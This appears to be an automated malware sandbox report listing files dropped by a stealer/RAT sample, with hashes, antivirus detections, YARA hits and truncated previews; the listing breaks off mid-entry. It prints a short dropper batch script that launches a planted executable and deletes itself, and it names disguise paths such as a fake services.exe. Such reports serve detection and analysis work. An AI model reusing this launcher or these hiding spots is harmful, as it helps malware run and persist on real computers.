                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

                                                  C:\Program Files\Uninstall Information\7ebef5d49c4292

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):184
                                                  Entropy (8bit):5.749484972738549
                                                  Encrypted:false
                                                  SSDEEP:3:AUGeTJqEqEdQSG3wUx98TF0W3kM2udyI3hKnaQoVNOjyQVTuhiof0y:AUGW/dQso80MyI3on0zsyIuhdfL
                                                  MD5:412A1A5359955F2301EC31B6194E2558
                                                  SHA1:36CF7969B1F42E3B9F303D1E21964572DA0715E6
                                                  SHA-256:97ADCB71924919CE2D9E063DA4C7433F58F54F6181C03A7024A9277240D3B7E1
                                                  SHA-512:94B8810F3F5644029D15B5E709D7284707EDE29B103808AE24FBB16F0C0367FA84DBE95579C2AF24A4CE5565C044EE9976499787FE336DF4A94C90C8CB075184
                                                  Malicious:false
                                                  Preview:PPmPsSNENkoufZBGeavwE62AwA6zg84AOu0QIKShaxreg4SDYCqLqnGSXmdrWXiOpofviv7UHOVRPYd1r2aeRsTkoi3frlKCOcy2YhfmEWDcSzC8JlAe7E76U5HA2bmgDSCxkkcJXyZ5p1Syf4WFkqFKf1idaetmthY9xPYiJ0GIpBRcmSe8Fh5W

                                                  C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

                                                  C:\Recovery\7ebef5d49c4292

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):151
                                                  Entropy (8bit):5.590568524630907
                                                  Encrypted:false
                                                  SSDEEP:3:Nqi9pMP2icrfQ1I6ipJivQEvAA93O2hLLXIeJQxkc82C/Gn:NqiVmHK+YA9rhIeJ//2C/Gn
                                                  MD5:D8920B6BA6E0450DB193B8C3BAC4F454
                                                  SHA1:B030E0E175BD125907E78095C28D4CB67AB160BB
                                                  SHA-256:2AC2F0EF8EC7B893F04B5366D2B7E427DB6EF00B942261F1A339DEA74F148740
                                                  SHA-512:372E2A492963AC8734A1C327FECAB91B0CAD8FE398632FD8773CB263A0745F040D2D6A47DB3867C61F075A89433DA4A3746BDE54955E0E5D6A38F74E28BC25E3
                                                  Malicious:false
                                                  Preview:eGVcsOGXVWI0RjEDdayCdGcnxzuaG3TIpvA5385toPbKDPVqOWTLlGpYorp2eqRbD9KfiIJeeEXNoRkheDLtjHhiGlRLTDP88AHDEzHGNyrgsctXHHYbeh15bmZ707LbyZPoJgdo5FgvaA0n24ELoyd

                                                  C:\Recovery\c5b4cb5e9653cc

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with very long lines (568), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):568
                                                  Entropy (8bit):5.888252290124134
                                                  Encrypted:false
                                                  SSDEEP:12:NjhrxKm6A3/nx0DcT2D7942OLO4p/WsaWJNjwciCOMCuaknF8Z8:acyDaVp/W7WfjwhCPCmF8C
                                                  MD5:7786CDC95BD57FBC11EB6533BE3B6DFE
                                                  SHA1:D2B1A2838E09B235FDAE0F3CF1009675AD2A26D9
                                                  SHA-256:F368C17C1B031AD6746CC4D3B4DFAB43278251F1FE3B3C0637E318AB69684DC4
                                                  SHA-512:84EB5CED2A88805FBF976D54C80215087446828F34B19878E89CF9098C06559C97246E98CA8B30ABF3305C2F7CD003CEB3B36ED7008E2BA7E83EE2AF104F9EE9
                                                  Malicious:false
                                                  Preview:M1fERGZU26DYFuKQu0JJkgNZlMfJ7Fk8DcrTbk9P82oTqbmEW9tyC98qoFdFlQXxWFVnC0yJ04Lr24tJjax7Vv5DdBpWH4nsf07kG9BfLj8HyRxtWUgLcZbkJRKBKcC6QcMB6ICkYRwwxxOLN59xXcPFZXayyAUsgB1VEvwNR6wLmpwWC8yPcPiyNGmjsNvY6EPw62HbIvgbpDdtkEvzMFPRcCI8JNfDKYOia9ZK1WGqtHJJn28nc6M1y7T4uIS5QcRRz4Slpl7z9iiV29VQO2lNLXudqeZtEKaQz2UsjX708W1PY7BvxBrX1DFbKz4KMOvyISfApnq04vPyffEsdo6CdCYwx2hudxntlDHGcBFJU1dGyQ6pvMrhSsVF4tNxF6XGHfMcX8QbiwrljR7g529RGGb3rBLsySEYeW9TDdRw5P8gAtgmvq1M7FABDTuWwhnQrTHMSocblMV0H527fj6Hb2bYW8Pts5AYmsyrmTUHOZkuuJ3Ibx0Nkgyz1t0UZssqM6OYGLVMOz3BRqnMEGS5EwxF39z2dAsfq4ix4fCPbo8vmxhLFnPS

                                                  C:\Recovery\jnowHpJlZlXal.exe

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  • Antivirus: Virustotal, Detection: 55%, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

                                                  C:\Recovery\services.exe

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BridgePortsurrogateserverref.exe.log

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1396
                                                  Entropy (8bit):5.350961817021757
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19253
                                                  Entropy (8bit):5.006225694120903
                                                  Encrypted:false
                                                  SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeYo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiYo+OdBANZD
                                                  MD5:6EC700FCB0AE97553EC01FAEA088C747
                                                  SHA1:2D184B28CB5949B49AD548781AD33CDE9BE1F100
                                                  SHA-256:B60FC2B328749BD47822EE102E4F1D1618278CB6C899C9A2AAEF97C1F6410AEF
                                                  SHA-512:D889E914C32104F69181E9880E4ABE98B71B3BDE0784AA7A8D3F20CE083CFACDB922A63935239339AA195A6B1AEB4C69C994C37A08E041C56A5CB5C91049F9DE
                                                  Malicious:false
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllultnxj:NllU
                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                  Malicious:false
                                                  Preview:@...e................................................@..........

                                                  C:\Users\user\AppData\Local\Temp\63XH3vru4T

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.323856189774723
                                                  Encrypted:false
                                                  SSDEEP:3:kSq+7dddL:kn+7dddL
                                                  MD5:C220191A10AFE8752DD158D96C55B2A4
                                                  SHA1:8BD9A0A4D7B0C86B4EBFC2973D66648444E93DBE
                                                  SHA-256:80425FECFF8DBBE86DECAB0466150D0EB5F5130387174BE68AE0C764162978E4
                                                  SHA-512:6F393F467683FEA0D62A0FD3D92EDEE4DE42F8A81C60E2F419179EFF2875A7E8127D5011D808F6533A0A137834D783553A3283735A5F0122C6187361D1D6BC33
                                                  Malicious:false
                                                  Preview:NLcwnGZBmfptCOt1pNVH8kxkA

                                                  C:\Users\user\AppData\Local\Temp\8SIf5KWJtt.bat

                                                  Download File
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):225
                                                  Entropy (8bit):5.24375311878078
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DERLv+IvKOZG1cNwi23f7UEh:HTg9uYDERLvXeZDUEh
                                                  MD5:AC7BF65FF0DE2462C1D75DFE1707E73D
                                                  SHA1:19A093CEC9C9FA4C5A8A57DBFE469228F07A17DC
                                                  SHA-256:D94BE9A958C1B956550C5DBFA93BD5C47E83AF0390954AF40387E46C13215372
                                                  SHA-512:4ED4A178C18A6558A004CFD776111818C6E9AF9CFD6424093B718B67155C66C92FD95246D979EE2F1BEC228289E220A36141FBF13AD204B33F6E1CE23B3ED16F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8SIf5KWJtt.bat"

                                                  C:\Users\user\AppData\Local\Temp\RES63F2.tmp

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 13:39:29 2025, 1st section name ".debug$S"
                                                  Category:modified
                                                  Size (bytes):1924
                                                  Entropy (8bit):4.6147682545775135
                                                  Encrypted:false
                                                  SSDEEP:24:HZm9BaLzcuvZHiwKtGDN6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:aaLzLvZZKuklmuulB+hnqXSfbNtmhn
                                                  MD5:FCA6B747F35EAB99AB2AEC32EBA49CF1
                                                  SHA1:4C682F1FB79E3303F315BE86C8DE34063305C53F
                                                  SHA-256:04302F230A136EAA63436FD740AF5F7EB360773853F4AB44B3CCC4F2669541C2
                                                  SHA-512:1320A00066716CDD08AA46370CE82F17E4DB878D0F8C5FC83C5ED45D79F34BC2EAF9754F65DBD932CDD98F5B5A62D8E2915B4A34E5D3E58306337D6593075D95
                                                  Malicious:false
                                                  Preview:L......g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP.....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\msportComWin.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

                                                  C:\Users\user\AppData\Local\Temp\RES6615.tmp

                                                  Download File
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Mon Jan 13 13:39:30 2025, 1st section name ".debug$S"
                                                  Category:modified
                                                  Size (bytes):1948
                                                  Entropy (8bit):4.566493323979637
                                                  Encrypted:false
                                                  SSDEEP:24:H+jG9E1XOCTZHDwKtGDNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:RaZ0KuMluOulajfqXSfbNtmhY2Z
                                                  MD5:A7F365634996B4EB5886DB6046ABA3A9
                                                  SHA1:E336F9114FBC2FE1FB78656745A9D25A75DF77B6
                                                  SHA-256:B21A79C9B8202BFF913B34515B624119F5D3ED8B9061A81FDA1B4C3B0580B970
                                                  SHA-512:896424A70A939F04CF3588322A99684EE4DBE5F47F927D63EB8E7EFB1A6D793C6B6469CC86B75B54B2466D908691E26F035BC50B40E1AFBD81811B642A939D70
                                                  Malicious:false
                                                  Preview:L......g.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES6615.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\msportComWin.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_003doig4.tal.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0bli00yu.3ro.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22br5aq4.0wf.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2bqcbc1k.lb1.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31iynuu1.5fg.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35dkj2vz.zq5.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3djuyz41.v1e.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ihiwt3x.evc.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3o5z1mfu.1od.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
